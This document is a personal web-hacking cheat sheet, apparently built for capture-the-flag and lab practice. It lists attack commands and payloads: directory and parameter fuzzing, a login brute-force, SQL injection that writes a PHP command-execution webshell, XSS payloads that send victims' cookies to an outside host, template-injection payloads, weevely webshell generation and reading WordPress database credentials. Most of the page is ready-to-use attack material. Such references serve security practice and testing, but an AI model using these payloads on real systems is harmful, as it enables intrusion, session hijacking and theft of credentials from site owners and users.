Hooper Labs

Web Hacking

Directory Busting

Gobuster

	gobuster dir -u <ip> -w /usr/share/dirb/wordlists/big.txt

Dirbuster

	dirb http://target/directory/ /usr/share/dirb/wordlists/common.txt

Find Parameters Wordlists

	find . | grep -i param

Bust Parameter Names

	wfuzz --hw 0 -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt http://target.com/shell.php?FUZZ=id

Wfuzz Headers Through Proxy

	wfuzz -u http://example.com/admin.php -H FUZZ:127.0.0.1 -w /usr/share/headers.txt -p 127.0.0.1:8080:HTTP

Wfuzz Multiple Parameters

	wfuzz --hh 19 -u "http://10.10.36.35:8081/auth?login=FUZZ&password=FUZ2Z" -z file,users.txt -z file,/usr/share/wordlists/rockyou.txt

Wfuzz Subdomain Enumeration

	wfuzz --hl 107 -u http://10.10.116.180 -H "Host: FUZZ.cmess.thm" -w /usr/share/wordlists/commonspeak2-subdomains.txt

ffuf with Headers

	ffuf -w ../wordlists/common.txt -H "Cookie: token=foo; ctfchallenge=bar" -u http://www.vulnbegin.co.uk/cpadmin/FUZZ

ffuf to brute password

	ffuf -w ../wordlists/10-million-password-list-top-100.txt -X POST -d "username=admin&password=FUZZ" -H "Cookie: ctfchallenge=cookie" -H "Content-Type: application/x-www-form-urlencoded" -u http://www.vulnbegin.co.uk/cpadmin/login -mc all -fc 200

Local File Inclusion

List of Windows Files

	<a href="http://pwnwiki.io/?_escaped_fragment_=presence/windows/blind.md#!presence/windows/blind.md">Windows Blind Files</a>

SQL Injection

Basic sqlmap

	sqlmap -u <target-url>

sqlmap maximum risk & specify DBMS

	sqlmap -u <target-url> --DBMS=MSSQL 

Specific sqlmap

	sqlmap -u <url> --data 'param1=foo&param2=bar' --cookie 'MYCOOKEID=foobar; ANOTHERCOOKIE=foobar2' -p param1 -D <database-name> --file-write=file.php --file-dest=/var/www/wp-content/uploads/2020/05/file.php

MySQL (Inject malicious PHP code into file)

	SELECT '<?php passthru($_GET[cmd])?>' INTO OUTFILE '/var/www/cmd.php'

Sqlite (Into Outfile equivalent)

	 ATTACH DATABASE '/home/devnull/public_html/test.php' as pwn;
  	CREATE TABLE pwn.shell (code TEXT);
 	INSERT INTO pwn.shell (code) VALUES ("test");

Multiple Columns in a Single Column

	' UNION SELECT username || '~' || password FROM users--

Allow login for user externally

Odds & Ends

FireFox Browse Nonstandard Ports

	about:config -- network.security.ports.banned.override (String <port-num>)

Webdav

	sudo mount -t davfs http://<target-server>:<port> /mnt/webdav

Wordpress

Post-Exploitation

	Database credentials located in wp-config.php (cat wp-config.php | grep DB_)

Wordpress Scan

	wpscan --url <domain>  -e ap,at,u,cb,dbe --password-attack 

xmlrpc -P /usr/share/wordlists/fasttrack.txt -o wpscan.txt

XSS

SVG - No spaces

	<svg/OnLoad="`${prompt``}`">

Cookie Stealing

	<script>document.write('<img src="https://www.hooperlabs.xyz/cookie?' + document.cookie + '">')</script>

Cookie Stealing

	<iframe src=http://10.2.188.2 onload="this.src='http://10.2.188.2?' + document.cookie">

XSS Web Request

	http://challenge.acictf.com:61470/search?search=foo&foobarh00p%3Csvg//onload%3d%22alert(1)%22%3E=%3Cscript%3E

SVG - No spaces

	<svg/OnLoad="`${prompt``}`">

Cookie Stealing

	<script>document.write('<img src="https://www.hooperlabs.xyz/cookie?' + document.cookie + '">')</script>

Cookie Stealing (with img)

	function addImage(){var img = document.createElement('img');img.src = 'https://www.hooperlabs.xyz/' + document.cookie; document.body.appendChild(img);}; addImage();

Update Cookie within Browser

	javascript:void(document.cookie="myCookie=thisismystolencookie");

Crypto

ECB (ref)

Attacking ECB

Cloud

Domain Hijacking

	Have 404s pointing to a S3 bucket?  Take over the subdomain!

F5 TCL Injection (Send the following in JSESSIONID that doesn't respond typical JSESSIONID)

SSTI

Jinja2 reads from templates directory

	{{config}}

CSTI

AngularJS

	{{constructor.constructor('alert(123)')()}}

Vue

	{{{}.toString.constructor('alert(123)')()}}

Clone Websites

Download all files (wget)

	wget -r -np -k &lt;URL&gt;

Webshells

Generate password-protected webshell (weevely)

	weevely generate mysecretpassword <path>

Interact with weevely webshell

	weevely <url> mysecretpassword